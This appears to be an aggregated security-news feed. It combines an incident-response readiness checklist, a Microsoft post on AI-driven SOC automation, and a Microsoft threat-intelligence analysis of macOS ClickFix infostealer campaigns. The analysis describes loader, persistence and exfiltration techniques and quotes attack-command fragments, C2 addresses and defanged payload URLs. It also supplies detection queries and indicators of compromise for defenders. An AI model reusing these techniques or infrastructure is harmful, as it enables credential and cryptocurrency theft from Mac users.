If background checks are first raised during an active incident, the organization has already failed the readiness test. Reputable IR firms handle vetting, certifications, and internal controls during onboarding. Those conversations belong in the retainer setup phase, not in the first hours of a breach.
The same is true of legal approval. If legal needs to decide in real time whether external responders can access production systems or regulated data, the response will slow immediately. Those decisions should be resolved before the incident.
A practical Day Zero readiness checklist
Organizations can test readiness by asking simple, operational questions.
Can a dormant IR account be enabled and used to pull authentication logs within 30 minutes?
Is a scoped read-only cloud role already defined, and are audit logs enabled across all relevant tenants?
Does the EDR platform have an investigator role that an external responder can use immediately, with access to at least 30 days of historical telemetry?
Can an external responder query the SIEM directly, and does retention cover at least 90 days across identity, endpoint, network, and cloud sources?
Who can authorize host isolation, VPN shutdown, credential rotation, or account suspension, and has that authority been exercised in an exercise?
If any of these questions produce hesitation, uncertainty, or the phrase “we’ll figure it out during an incident,” then that area is not ready.
For organizations with an IR retainer, additional questions matter. Are dormant accounts already created for retainer responders? Is MFA preconfigured? Are legal approvals complete? Does the IR firm have current contact information for the incident manager, CISO, and identity lead? Is there an established out-of-band channel that includes the IR firm? Has the full activation workflow been tested in a tabletop exercise from initial call through working access?
If several of these answers are no, the retainer is a contract, not an operational capability.
What organizations commonly overlook
Even mature organizations with strong security tooling and formal plans routinely discover important gaps only after a real incident begins.
Backups are a common example. Many organizations know backup jobs are completing, but have not verified that backups are isolated from the environment that an attacker has already compromised. If the same credentials, networks, or service accounts can reach backup infrastructure, attackers may be able to destroy recovery options before deploying ransomware. A backup that has never been restored, and never been tested for isolation, is still an assumption.
Containment authority is another frequent gap. Teams may know whether a system should be isolated or credentials should be rotated, but no one has explicit authority to disrupt operations. As the decision moves through leadership, legal, finance, or business operations, the attacker remains active. Prepared organizations decide in advance which systems can be shut down immediately, who can authorize those actions, and how emergency decisions will be escalated when necessary.
Short or fragmented logging retention is also common. Logs may exist but only for seven to fourteen days, or they may be scattered across tools and teams with no centralized access. In those cases, the organization can often see what is happening now but not how it started.
Untested response plans are equally dangerous. Many plans look complete in a binder and fail in practice because people do not know their roles, approvals take too long, and critical steps have never been exercised. Testing does not need to be elaborate. It needs to be realistic, cross-functional, and honest about what breaks.
Finally, many organizations lack a current asset inventory or network map. Systems are deployed outside formal processes, cloud resources are spun up without central registration, and ownership is unclear. Responders cannot investigate what they do not know exists. Untracked assets are not just documentation gaps. They are blind spots that attackers actively exploit.
A readiness exercise you can run now
Most of the recommendations in this guide can be tested this week with the people and systems already in place.
Start with access. Create dormant IR accounts and measure how long it takes to enable them. Attempt to pull 90 days of authentication logs. Ask your EDR administrator to create or validate an external investigator role. Confirm cloud audit logging is enabled across all relevant tenants and that a scoped read-only role can be activated immediately.
Then test the response itself. Run a tabletop exercise in which the IR firm has just been called in. Measure how long it takes before they can access identity logs, endpoint telemetry, and cloud audit trails. Test whether the incident manager can be reached and whether the out-of-band channel can be established quickly. Run a containment decision through the approval chain and time it.
Whatever fails in that exercise will fail the same way during a real incident. The difference is that during a real breach, the attacker is operating inside that gap while the organization is still figuring it out.
Conclusion
Readiness is not a policy document, a signed retainer, or a successful audit. It is the result of practical decisions made before an incident begins: access provisioned, authority clarified, communication paths tested, and operational gaps closed before an attacker can exploit them.
The organizations that contain incidents quickly are rarely the ones with the most impressive slide decks. They are the ones who did the unglamorous work in advance. They created the accounts, tested the workflows, validated the logs, practiced the decisions, and ensured that when the call came in, the response could begin immediately.
That is the real meaning of Day Zero readiness: not just having help available but being prepared to use it the moment it matters most.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
from The Hacker News https://ift.tt/pIMQs73
via IFTTT
Security operations are entering a new phase. As attack techniques grow faster and more complex, the effectiveness of a SOC depends less on collecting more data and more on how well platforms can turn context into action at scale.
KuppingerCole Analysts’ 2026 Emerging AI Security Operations Center (SOC) reflects this shift clearly: the future of security automation is not defined by static rules or isolated workflows, but by intelligence‑driven automation that supports analyst decision‑making across the full security lifecycle. This evolution mirrors what many security leaders already experience day to day, that the limiting factor is no longer alert volume, but human capacity.
Microsoft is excited to be named an Overall Leader, and the Market Leader, in this report, as we see automation as a core component of the future of cybersecurity.
From playbook‑driven SOAR to intelligence‑led automation
Traditional security orchestration, automation, and response (SOAR) solutions were built to automate predictable, repeatable tasks: enrichment steps, ticket creation, notifications, and predefined containment actions. These capabilities remain valuable, but they were designed for an era when incidents followed more deterministic patterns.
This is a critical change. In many SOCs today, analysts still spend significant time:
Stitching together context across alerts and data sources.
Manually triaging incidents that turn out to be benign.
Following repetitive investigation and response steps.
The result is slower response times and analyst burnout—at exactly the moment attackers are moving faster and operating more quietly.
Automation built into the analyst experience
Microsoft has evolved the way these common challenges can be addressed, leveraging machine learning, large language models (LLMs), and agents, including releases such as:
Automatic attack disruption: An always-on capability that limits lateral attackers and reduces the overall impact of an attack, from associated costs to loss of productivity, leaving security operations teams in complete control of investigating, remediating, and bringing assets back online.
Phishing triage agent: An agent that runs sophisticated assessments—including semantic evaluation of email content, URL and file inspection, and intent detection—to determine whether a submission is a true phishing threat or a false alarm.
AI powered incident prioritization: A machine learning prioritization model to surface the incidents that matter most, assigning each incident a priority score from 0–100 and explaining the key factors behind the ranking.
Playbook generator: An experience that allows users to create python-code playbooks using natural language for flexible workflow automation.
These capabilities are just the beginning of how we are introducing agents and automation to help users move faster, freeing analysts to focus on higher‑value tasks like proactive hunting and threat analysis.
The next evolution: The agentic SOC
The KuppingerCole report reinforces a broader industry trend, that security platforms must do more than automate pre‑defined workflows. They must support adaptive, intelligence‑driven operations that can respond to novel and fast‑moving threats.
This is where Microsoft is making its next set of investments: agentic security operations.
With innovations such as the Microsoft Sentinel MCP (Model Context Protocol) Server, shared security data and graph context, and deep integration with Microsoft Security Copilot, Sentinel is evolving into a platform where AI agents can:
Reason across identity, endpoint, cloud, and network signals.
Summarize incidents and investigations in natural language.
Assist with decision‑making by correlating weak signals over time.
Take action—with human oversight—when confidence thresholds are met.
These agents are designed to work alongside analysts, augmenting expertise and dramatically accelerating time to response.
Why this matters for security teams
The direction highlighted by KuppingerCole, and reflected in Microsoft’s roadmap, isn’t about chasing AI for its own sake. It’s about addressing real SOC pain points:
Scale: Human‑only operations don’t scale with modern attack surfaces.
Consistency: Automated and agent‑assisted workflows reduce variance and errors.
Speed: Faster reasoning and response directly reduce attacker dwell time.
By combining automation, rich context, and intelligent agents, Microsoft Sentinel helps SOC teams move from reactive alert handling to proactive, intelligence‑led defense without forcing teams to re‑architect their operations overnight.
Looking ahead
Security automation is no longer a bolt‑on capability. As KuppingerCole’s research makes clear, it is becoming a foundational element of modern security operations. The evolution of SOAR reflects the reality of a shift from static playbooks to adaptive, context‑aware assistance that scales human expertise.
Microsoft is investing accordingly, advancing an AI‑first approach to security analytics that helps SOC teams operate with greater speed, confidence, and resilience as threats continue to evolve. Read the Emerging AI Security Operations Center (SOC) report to learn more.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
Microsoft researchers continue to observe the evolution of an infostealer campaign distributing ClickFix‑style instructions and targeting macOS users. In this recent iteration, threat actors attempt to take advantage of users who are looking for helpful advice on macOS-related issues (for example, optimizing their disk space) in blog sites and other user-driven content platforms by hosting their malicious commands in these sites.
These commands, which are purported to install system utilities, load an infostealing malware like Macsync, Shub Stealer, and AMOS into the targets’ devices instead. The malware then collects and exfiltrates data, including media files, iCloud data and Keychain entries, and cryptocurrency wallets. In some campaigns, the malware replaces legitimate cryptocurrency wallet apps with trojanized versions, putting users at an added security risk.
Prior iterations of this campaign delivered the infostealers through disk image (.dmg) files that required users to manually install an application. This recent activity reflects a shift in tradecraft, where threat actors instruct users to run Terminal commands that leverage native utilities to retrieve remotely hosted content, followed by script‑based loader execution.
Unlike application bundles opened through Finder—which might be subjected to Gatekeeper verification checks such as code signing and notarization—scripts downloaded and launched directly through Terminal (for example, by using osascript or shell interpreters) don’t undergo the same evaluation. This delivery mechanism enables attackers to initiate malware execution through user‑driven command invocation, reducing reliance on traditional application delivery methods and increasing the likelihood of successful execution.
In this blog, we take a look at three campaigns that use this new tradecraft. We also provide mitigation guidance and detection details to help surface this threat.
Activity overview
Initial access
Standalone websites were seen hosting pages that included a Base64-encrypted instruction for end users to run. Some sites present this information in multiple languages. As of this writing, these websites that we’ve observed are either already down or have been reported.
Figure 1: Landing page of a script campaign (domenpozh[.]net)Figure 2. ClickFix instructions hosted on mac-storage-guide.squarespace[.]com.Figure 3. mac-storage-guide.squarespace[.]com page was seen presenting content in different languages, such as Japanese.
In other instances, content that included instructions leading to malware were observed to be hosted on Craft, a note-taking platform that lets writers and content creators take notes and distribute their content. We’ve observed that pages like macclean[.]craft[.]me were taken down relatively quickly.
Figure 4. ClickFix instruction hosted on macclean[.]craft[.]me.
Threat actors were also publishing fake troubleshooting posts on the popular blogging site Medium to distribute ClickFix instructions. These posts claim to solve common macOS problems. Blog sites such as macos-disk-space[.]medium[.]com instruct users to “fix” an issue by pasting a command into Terminal. The command then decodes and runs an AppleScript or Bash loader. These blogs were reported and taken down quickly.
We observed three distinct execution paths leveraging different infrastructure. We’re classifying these as a loader install campaign, a script install campaign, and a helper install campaign. In the loader and helper campaigns, we observed that a random seven-digit value (hereinafter referred to as random IDs), was used in data staging, marking the staging folders as /tmp/shub_<random ID> or/tmp/<random ID>.
The underlying goal remains the same in these campaigns: sensitive data collection, persistence, and exfiltration.
The following table summarizes the key differences between the campaigns. We discuss the details of each of these campaigns in the succeeding sections of this blog.
Activity or technique
Loader campaign
Script campaign
Helper campaign
Initial installation
No file written on disk
No file written on disk
/tmp/helper /tmp/update
Condition to exit execution
Russian keyboard detected
Failure to resolve an active command-and-control (C2) endpoint (all infrastructure checks fail)
Not applicable (handled in later loader/payload stages)
Trezor Suite.appLedger Wallet.app
Loader install campaign
Since February 2026, Microsoft researchers have observed a campaign that requests a loader shell from the attacker’s infrastructure using curl once a user copies and runs ClickFix commands using Terminal. It leads to further execution of a second-stage shell script.
This second shell script is a zsh loader that decodes and decompresses an embedded payload using Base64 and Gzip, respectively. It then executes the payload using eval.
Figure 5: Shell loader.
The next-stage script also functions as a macOS reconnaissance and execution ‑control loader that first fingerprints the system by collecting the following information:
Keyboard locale
Hostname
Operating system version
External IP address
It then builds and sends a JSON object to an attacker‑controlled server containing an event name (loader_requested or cis_blocked) along with this telemetry. It also uses the presence of Russian/CIS keyboard layouts as a deliberate kill switch, reporting a cis_blocked event and stop the execution.
Figure 6: Reconnaissance loader with CIS kill switch.
If the system isn’t blocked, the script silently beacons a “loader requested” event and then downloads and executes a remote AppleScript payload directly in memory using osascript.
Figure 7: Reconnaissance loader with AppleScript payload delivery.
AppleScript infostealer
This multi-stage macOS AppleScript stealer employs user interaction-based credential capture, conducts broad data collection across browsers, Keychains, messaging applications, wallet artifacts, and user documents, and stages the collected data into a compressed archive for exfiltration to a remote endpoint. The malware further tampers with locally installed applications to intercept sensitive data, establishes persistence through a masqueraded LaunchAgent that mimics legitimate software updates, and maintains remote command execution capabilities by periodically polling a server for instructions, which are executed at runtime.
Data collection: tmp/shub_<random ID> staging
We observed that the stealer self-identifies as “SHub Stealer” (it writes the marker SHub into its staging directory). It prompts the target user to enter their password, pretending to install a “helper” utility. It then validates the entered password using the command dscl . -authonly <username>. Upon successful validation, it sends a password_obtained event to its C2 infrastructure.
The malware stages collected data under a /tmp/shub_<random ID>/ folder. The collected data includes:
Browser credentials
Notes
Media files
Telegram data
Cryptocurrency wallets
Keychain entries
iCloud account data
The stealer also collects documents smaller than 2 MB and stages them within a FileGrabber repository located at /tmp/shub_<random ID>/FileGrabber/.
The targeted file types are:
txt
pdf
docx
wallet
key
keys
doc
jpeg
png
kdbx
rtf
jpg
seed
Once the data collection is complete, data is compressed and exfiltrated. The stealer deletes staging artifacts to reduce forensic evidence.
Wallet exfiltration and trojanization
Subsequently, the stealer probes the system for the presence of any of the following cryptocurrency wallet applications:
Electrum
Coinomi
Exodus
Atomic
Wasabi
Ledger Live
Monero
Bitcoin
Litecoin
DashCore
lectrum_LTC
Electron_Cash
Guarda
Dogecoin
Trezor_Suite
Sparrow
When it finds any of these applications, it stages their data for exfiltration.
The stealer was also observed replacing legitimate cryptocurrency wallets apps with attacker-controlled or trojanized ones:
Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc/app.zip
Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
Exodus.app is replaced by appex.zip fetched from <C2 domain>/zxc/appex.zip
These trojanized cryptocurrency wallet applications pose a serious risk to their users who might be unaware of the stealthy compromise and continue to use and transact with them.
Figure 8. Trojanized apps installation.
Persistence
For persistence, the malware creates an additional script within the newly created ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ folder.
A malicious implant named GoogleUpdate is configured to RunAtLoad disguised as an agent. Microsoft Defender Antivirus detects this implant as Trojan:MacOS/SuspMalScript.
A new property list (plist), /Library/LaunchAgents/com.google.keystone.agent.plist,is then staged to run this agent.
Figure 9. Plist staging.
The executable is then given permission to run with the following command:
Figure 10. GoogleUpdate granted permission to run.
Once com.google.keystone.agent.plist loads, it functions as a backdoor-style bot component that registers the infected macOS system with attacker infrastructure at <C2 domain>/api/bot/heartbeat, uniquely identifies the host using a hardware-derived ID, and periodically beacons system metadata such as hostname, operating system version, and external IP address.
The C2 server can return Base64-encoded instructions, which the script decodes and executes locally and deletes traces, enabling remote command execution on demand. This process creates a persistent remote-control channel, where the attacker could push arbitrary shell code to the infected device at any time.
Figure 11. Backdoor style bot with heartbeat driven payload execution.
Script install campaign
In April 2026, Microsoft researchers observed an ongoing campaign that runs a heavily obfuscated infostealer when users run it through Terminal.
The attack begins with a social‑engineering instruction containing a Base64‑encoded command.
When decoded, this instruction resolves a one‑line shell pipeline that retrieves a remote script, which is then handed off immediately for execution. By encoding the command and streaming its output directly into the shell, the attacker avoids placing a recognizable payload on disk during the initial stage.
Figure 12. Payload delivery.
The retrieved script.sh payload is launched directly from the network stream, with no intermediate file written to disk. It’s responsible for establishing persistence and deploying follow-on functionality. It delivers the second-stage Base64 encoded script under a plist staged at ~/Library/LaunchAgent/com.<random name>.plist.
Figure 13. Payload staged into a plist.
The persisted AppleScript is heavily obfuscated in its original form (character ID concatenation). After decoding, the key logic follows:
Figure 14. AppleScript stager (decoded).
This AppleScript functions as a C2 discovery and execution orchestrator for a macOS malware campaign. The AppleScript is used as the control layer and standard Unix tools for network interaction and execution. Its first role is C2 discovery. It iterates over a list of potential server identifiers (for example {0x666[.]info}), constructs candidate URLs (http://<value>/), and probes them using curl with a realistic Chrome macOS user agent and a benign POST body (-d “check”). This connectivity test is performed through the following command:
If none of the hard‑coded infrastructure responds successfully, the script falls back to Telegram‑based C2 discovery. It fetches a Telegram bot page using curl -s hxxps://t[.]me/ax03bot and extracts a hidden server identifier embedded in an HTML <span dir=”auto”> element using sed. This lets the attacker rotate C2 infrastructure dynamically.
Figure 16. Telegram-based C2 endpoint discovery.
Once a working C2 endpoint is identified, the script moves into execution orchestration. It sends a final POST request to the resolved server containing a transaction ID (txid) and module identifier, then immediately pipes the server response into osascript for execution:
This command enables arbitrary AppleScript execution directly from the server, fully in memory, with no payload written to disk. Output and errors are suppressed, and execution only proceeds if all connectivity checks succeed. Overall, this isn’t a simple downloader but a resilient, infrastructure‑aware loader designed to dynamically discover C2 endpoints, evade takedowns, and execute attacker‑controlled AppleScript logic on demand.
We observed data exfiltration to the attacker’s infrastructure on a C2/upload.php endpoint leveraging curl.
Figure 17. Exfiltration of archived data.
Helper install campaign (AMOS)
Starting at the end of January 2026 , another ClickFix campaign relied on an executable file named helper or update to run. In this campaign, once a user ran the encoded ClickFix instructions, a first-stage script decoded a Base64 payload and then decompressed the payload using Gunzip.
Figure 18. First-stage script requested.
The first-stage script led to the retrieval of the second stage-malicious Mach Object (Mach-O) executable into the newly created /tmp/<file name> folder.
Figure 19. /tmp/helper installation.
In February 2026, this campaign retrieved the payload under a /tmp/update folder.
Figure 20. /tmp/update installation.
This malicious executable file has its extended properties removed and is then given permission to run and launch on the victim’s device.
Virtualization detection
The infection chain begins with an AppleScript based stager that uses array subtraction obfuscation to conceal its strings and commands. This stager performs an anti-analysis gate by invoking system_profiler and inspecting both memory and hardware profiles. Specifically, it searches for common virtualization indicators such as QEMU, VMware, and KVM. In addition to explicit hypervisor vendor strings, the script also checks for a set of generic hardware artifacts commonly observed in virtualized or analysis environments, including:
Chip: Unknown
Intel Core 2
Virtual Machine
VirtualMac
If any of these indicators are present, execution is terminated early, preventing further stages from running.
Data collection and exfiltration
Like the loader install campaign, the stealer prompts the user to enter their password. It validates locally whether the entered password is correct using dscl utility.
After capturing the target user’s password, the malware then focuses on stealing high-value credentials and financial artifacts. It copies macOS Keychain databases, enabling access to stored website passwords, application secrets, and WiFi credentials.
It also collects browser authentication material from Chromium‑based browsers, including saved usernames and passwords, session cookies, autofill data, and browser profile state that can be reused for account takeover. In addition, the script targets cryptocurrency wallets, copying data associated with both browser‑based and desktop wallets. This includes browser extensions such as MetaMask and Phantom, as well as desktop wallets including Exodus and Electrum.
The stealer compresses collected data into a ZIP file /tmp.out.zip, which is then exfiltrated to a <C2 domain>/contact> endpoint. The stealer removes staging artifacts to reduce forensic evidence.
Figure 21. Archiving and exfiltration of data.
Wallet exfiltration and trojanization
Similar to the loader campaign, the stealer in the helper also replaces legitimate wallet apps with attackers-controlled ones:
Ledger Wallet.app is replaced by app.zip fetched from <C2 domain>/zxc.app.zip.
Trezor suite.app is replaced by apptwo.zip fetched from <C2 domain>/zxc/apptwo.zip
Backdoor deployment and persistence
To maintain long‑term access to infected systems, the helper campaign deploys a multi‑stage persistence mechanism built around two cooperating components: a primary backdoor binary and a lightweight execution wrapper.
Download and execution of the backdoor component (.mainhelper)
The persistence chain begins with the download of a second‑stage backdoor implant named .mainhelper into the current user’s home directory. As shown in Figure 22, the obfuscated AppleScript issues a network retrieval command that fetches this Mach‑O executable from an attacker-controlled endpoint (<C2 domain>/zxc/kito) and writes it as a hidden file under the user profile.
Figure 22. Second implant downloaded.
Once it’s given attributes and permissions to run, the /.mainhelper implant joins the compromised device to a C2 endpoint hxxp://45.94.47[.]204/api/. The implant executes tasks from the attacker, providing a remote-control capability to the attacker on the compromised system.
Figure 23. C2 instance.
Creation of the execution wrapper (.agent)
In addition to the backdoor binary, the stealer creates a secondary file named .agent, also placed in the user’s home directory. Unlike .mainhelper, .agent isn’t a full implant. Instead, it is a lightweight shell wrapper whose sole purpose is to launch and supervise the .mainhelper process. The script writes the wrapper to disk and configures it so that, if the backdoor process terminates or crashes, .agent relaunches it.
After prompting the victim for their macOS password and validating it, the script escalates privileges to establish system-level persistence. It constructs a LaunchDaemon plist, stages the XML content to a temporary file (/tmp/starter), and then writes it to /Library/LaunchDaemons/com.finder.helper.plist.
LaunchDaemon plist staging and loading
LaunchDaemon is configured to run /bin/bash with the path to ~/.agent as its argument, rather than invoking the backdoor binary directly. As shown in Figure 25, the script sets correct ownership, loads the daemon using launchctl, and enables both RunAtLoad and KeepAlive.
Figure 24. Plist staging.
As a result, on every system boot, launchd runs the .agent wrapper with root privileges, which in turn ensures that the .mainhelper backdoor process is running.
Figure 25. Plist loading.
Mitigation and protection guidance
Apple Xprotect has updated signatures to protect users against this threat. Additionally, in macOS 26.4 and later, Apple has introduced a mitigation that directly addresses the ClickFix delivery mechanism.
When a user attempts to paste a potentially malicious command into Terminal, they will now see the following prompt:
Possible malware, Paste blocked
Your Mac has not been harmed. Scammers often encourage pasting text into Terminal to try and harm your Mac or compromise your privacy. These instructions are commonly offered via websites, chat agents, apps, files, or a phone call.
Organizations can also follow these recommendations to mitigate threats associated with this threat:
Educate users. Warn them against running instructions from untrusted sources.
Monitor Terminal usage. Alert on suspicious Terminal or shell sessions spawned by installers or user apps.
Detect native tool abuse. Flag unusual sequences of macOS utilities (curl, Base64, Gunzip, osascript, and dscl).
Inspect outbound downloads. Monitor curl activity fetching encoded or compressed payloads from unknown domains.
Protect credential stores. Detect unauthorized access to keychain items, browser data, SSH keys, and cloud credentials.
Monitor data staging. Alert on archive creation of sensitive artifacts followed by HTTP POST exfiltration.
Enable endpoint protection. Ensure macOS endpoint detection and response (EDR) or extended detection and response (XDR) monitors script execution and living‑off‑the‑land behavior.
Restrict C2 traffic. Block outbound connections to suspicious or newly registered domains.
Microsoft also recommends the following mitigations to reduce the impact of this threat.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats.
Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Allow investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on tamper protection features to prevent attackers from stopping security services. Combine tamper protection with the DisableLocalAdminMerge setting to mitigate attackers from using local administrator privileges to set antivirus exclusions.
Microsoft Defender detections
Microsoft Defender customers can refer to the list of applicable detections below. Microsoft Defender coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Execution
User copies, pastes, and runs Base64 instructions Base64 instructions are deobfuscated Executable files are created from remote attacker’s infrastructureInstalled malware implant is executed Malicious AppleScript is retrieved from attacker infrastructureSequence of malicious instructions are executed
Microsoft Defender for Endpoint Suspicious shell command execution Obfuscation or deobfuscation activity Executable permission added to file or directory Suspicious launchctl tool activity ‘SuspMalScript’ malware was prevented Possible AMOS stealer Activity Suspicious AppleScript activity Suspicious piped command launched Suspicious file or information obfuscation detected
Microsoft Defender Antivirus Trojan:MacOS/Multiverze – Created executable file Trojan:MacOS/SuspMalScript – Malware implant downloaded by the loader campaign Behavior:MacOS/SuspAmosExecution – Malicious file execution Behavior:MacOS/SuspOsascriptExec – Malicious osascript execution Behavior:MacOS/SuspDownloadFileExec – Suspicious file download and execution Behavior:MacOS/SuspiciousActiviyGen
Data collection
Malware collects data from bash history, browser credentials, and other sensitive foldersMultiple files are collected into staging foldersCollected data is staged and archived into a folder Staging folders are removed
Microsoft Defender for Endpoint Suspicious access of sensitive filesSuspicious process collected data from local systemEnumeration of files with sensitive dataSuspicious archive creationSuspicious path deletion
Microsoft Defender Antivirus Behavior:MacOS/SuspPassSteal – Suspicious process collected data from local systemTrojan:MacOS/SuspDecodeExec – Malicious plist detection
Defense evasion
Malware deletes the staging paths following exfiltrationExecution of obfuscated code to evade inspection
Microsoft Defender for Endpoint Suspicious path deletionSuspicious file or information obfuscation detected
Credential access
Malware steals user account credential and stages files for exfiltration
Microsoft Defender for Endpoint Suspicious access of sensitive filesUnix credentials were illegitimately accessed
Exfiltration
Malware exfiltrates staged data using curl and HTTP POST
Microsoft Defender for Endpoint Possible data exfiltration using curl
Microsoft Defender Antivirus Behavior:MacOS/SuspInfoExfilTrojan:MacOS/SuspMacSyncExfil
Threat intelligence reports
Microsoft Defender customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to help prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender
Microsoft Defender customers can run the following queries to find related activity in their networks:
Initial access
//Loader campaign installation
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_any ("loader.sh?build=","payload.applescript?build=")
// Helper campaign installation
DeviceFileEvents
| where InitiatingProcessCommandLine has_all("curl", "/tmp/helper","-o")
//Install of /update install campaign
DeviceFileEvents
| where InitiatingProcessCommandLine has_all("curl", "/tmp/update","-o")
| where FileName== "update"
Exfiltration to C2 infrastructure
//loader campaign
DeviceProcessEvents
| where ProcessCommandLine has_all("curl", "post","/debug/event", "build_hash")
DeviceProcessEvents
| where ProcessCommandLine has_all("curl","/tmp","post","-H","-f","build","/gate")
| where not (ProcessCommandLine has_any(".claude/shell-snapshots"))
//script campaign
DeviceNetworkEvents
| where InitiatingProcessCommandLine has_all ("curl","-F","txid","zip","max-time")
//helper campaign
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("curl","post","-H","user","buildid","cl","cn","/tmp/")
Bot C2 installation and communication
//loader campaign - bot install
DeviceFileEvents
| where InitiatingProcessCommandLine =="base64 -d"
| where FolderPath endswith @"Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate"
//loader campaign – bot communication
DeviceProcessEvents
| where ProcessCommandLine has_all("/api/bot/heartbeat","post","curl")
//script campaign second stage execution
DeviceProcessEvents
| where ProcessCommandLine has_all("curl","POST","txid","osascript","bmodule","max-time")
//helper campaign - bot install
//Alternate query for helper or bot update installation
DeviceFileEvents
| where InitiatingProcessCommandLine has_all ("curl","zxc","kito")
DeviceProcessEvents
| where InitiatingProcessFileName =="osascript"
| where ProcessCommandLine has_all ("sh","echo","-c", "cp","/tmp/starter",".plist")
Indicators of compromise
Domains distributing ClickFix
Indicator
Type
Description
cleanmymacos[.]org
Domain
Distribution of ClickFix instructions
mac-storage-guide.squarespace[.]com
Domain
Distribution of ClickFix instructions
claudecodedoc[.]squarespace[.]com
Domain
Distribution of ClickFix instructions
domenpozh[.]net
Domain
Distribution of ClickFix instructions
macos-disk-space[.]medium[.]com
Domain
Distribution of ClickFix instructions
macclean[.]craft[.]me
Domain
Distribution of ClickFix instructions
apple-mac-fix-hidden[.]medium[.]com
Domain
Distribution of ClickFix instructions
Loader campaign
Indicator
Type
Description
rapidfilevault4[.]sbs
Domain
Payload delivery and C2
coco-fun2[.]com
Domain
Payload delivery and C2
nitlebuf[.]com
Domain
Payload delivery and C2
yablochnisok[.]com
Domain
Payload delivery and C2
mentaorb[.]com
Domain
Payload delivery and C2
seagalnssteavens[.]com
Domain
Payload delivery and C2
res2erch-sl0ut[.]com
Domain
Payload delivery and C2
filefastdata[.]com
Domain
Payload delivery and C2
metramon[.]com
Domain
Payload delivery and C2
octopixeldate[.]com
Domain
Payload delivery and C2
pewweepor092[.]com
Domain
Payload delivery and C2
bulletproofdomai2n[.]com
Domain
Payload delivery and C2
benefasts-fhgs2[.]com
Domain
Payload delivery and C2
repqoow77wiqi[.]com
Domain
Payload delivery and C2
do2wers[.]com
Domain
Payload delivery and C2
rapidfilevault4[.]cyou
Domain
Payload delivery and C2
reews09weersus[.]com
Domain
Payload delivery and C2
pepepupuchek13[.]com
Domain
Payload delivery and C2
pewqpeee888[.]com
Domain
Payload delivery and C2
wewannaliveinpicede[.]com
Domain
Payload delivery and C2
datasphere[.]us[.]com
Domain
Payload delivery and C2
rapidfilevault5[.]sbs
Domain
Payload delivery and C2
coco2-hram[.]com
Domain
Payload delivery and C2
poeooeowwo777[.]com
Domain
Payload delivery and C2
korovkamu[.]com
Domain
Payload delivery and C2
metrikcs[.]com
Domain
Payload delivery and C2
metlafounder[.]com
Domain
Payload delivery and C2
terafolt[.]com
Domain
Payload delivery and C2
haploadpin[.]com
Domain
Payload delivery and C2
rawmrk[.]com
Domain
Payload delivery and C2
mikulatur[.]com
Domain
Payload delivery and C2
milbiorb[.]com
Domain
Payload delivery and C2
doqeers[.]com
Domain
Payload delivery and C2
we2luck[.]com
Domain
Payload delivery and C2
quantumdataserver5[.]homes
Domain
Payload delivery and C2
bintail[.]com
Domain
Payload delivery and C2
molokotarelka[.]com
Domain
Payload delivery and C2
trehlub[.]com
Domain
Payload delivery and C2
avafex[.]com
Domain
Payload delivery and C2
rhymbil[.]com
Domain
Payload delivery and C2
boso6ka[.]com
Domain
Payload delivery and C2
res2erch-sl2ut[.]com
Domain
Payload delivery and C2
pilautfile[.]com
Domain
Payload delivery and C2
bigbossbro777[.]com
Domain
Payload delivery and C2
miappl[.]com
Domain
Payload delivery and C2
peloetwq71[.]com
Domain
Payload delivery and C2
fastfilenext[.]com
Domain
Payload delivery and C2
beransraol[.]com
Domain
Payload delivery and C2
pelorso90la[.]com
Domain
Payload delivery and C2
medoviypirog[.]com
Domain
Payload delivery and C2
wewannaliveinpice[.]com
Domain
Payload delivery and C2
malkim[.]com
Domain
Payload delivery and C2
pipipoopochek6[.]com
Domain
Payload delivery and C2
hello-brothers777[.]com
Domain
Payload delivery and C2
dialerformac[.]com
Domain
Payload delivery and C2
persaniusdimonica8[.]com
Domain
Payload delivery and C2
hilofet[.]com
Domain
Payload delivery and C2
tmcnex[.]com
Domain
Payload delivery and C2
nibelined[.]com
Domain
Payload delivery and C2
pissispissman[.]com
Domain
Payload delivery and C2
bankafolder[.]com
Domain
Payload delivery and C2
perewoisbb0[.]com
Domain
Payload delivery and C2
us41web[.]live
Domain
Payload delivery and C2
uk176video[.]live
Domain
Payload delivery and C2
jihiz[.]com
Domain
Payload delivery and C2
beltoxer[.]com
Domain
Payload delivery and C2
swift-sh[.]com
Domain
Payload delivery and C2
hitkrul[.]com
Domain
Payload delivery and C2
kofeynayagush[.]com
Domain
Payload delivery and C2
Script campaign
Indicator
Type
Description
hxxps://cauterizespray[.]icu/script[.]sh
URL
Payload delivery
hxxps://enslaveculprit[.]digital/script[.]sh
URL
Payload delivery
hxxps://resilientlimb[.]icu/script[.]sh
URL
Payload delivery
hxxps://thickentributary[.]digital/script[.]sh
URL
Payload delivery
